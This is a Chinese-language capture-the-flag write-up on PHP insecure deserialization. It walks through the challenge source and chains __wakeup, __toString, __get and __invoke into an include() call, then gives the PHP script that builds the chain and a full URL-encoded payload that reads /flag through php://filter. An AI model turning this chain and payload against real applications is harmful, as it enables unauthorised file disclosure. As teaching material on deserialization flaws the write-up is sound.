题目:
一、代码分析
if(isset($_GET['wish'])){
@unserialize($_GET['wish']);
}
else{
$a=new Road_is_Long;
highlight_file(__FILE__);
}
GET传入参数wish,并反序列化。那么我们应该要传入一个序列化数据。
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
Road_is_Long类中,__toString()在该类被当作字符串处理的时候执行,__wakeup()方法下的preg_match()将$page变量当作字符串处理。如果我们把类中的 $page 赋值为此类本身,则当其触发__wakeup() 方法后,触发__toString()。而unserialize()会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup()方法,所以当我们利用该类构造的序列化数据传入时,此类下的__wakeup() 方法就会调用。
然而触发__toString()下的$this->string->page该如何利用?
看Make_a_Change类下,有一个__get()方法,当访该类中私有或者不存在的成员属性值时调用。而Make_a_Change类中没有$page变量,则将Road_is_Long类中的$string赋值为Make_a_Change类,可以触发__get()方法。此__get()将$effort当作函数执行,并返回。
再来看Try_Work_Hard类,其__invoke()方法,在把该类当作函数执行时调用。__invoke()下的append()就是使用include()包含一个目标。因此将Make_a_Change类中的$effort赋值为Try_Work_Hard类,再将Try_Work_Hard类中的$var赋值为php://filter/convert.base64-encode/resource=/flag
二、构造pop链
<?php
class Road_is_Long{
public $page;
public $string;
}
class Try_Work_Hard{
protected $var="php://filter/convert.base64-encode/resource=/flag";
}
class Make_a_Change{
public $effort;
}
$a = new Make_a_Change();
$o = new Road_is_Long();
$a->effort=new Try_Work_Hard();
$o->string = $a;
$p = new Road_is_Long();
$p->page=$o;
echo urlencode(serialize($p));
?>
payload:
?wish=O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BN%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A49%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D
把结果base64解码,即是flag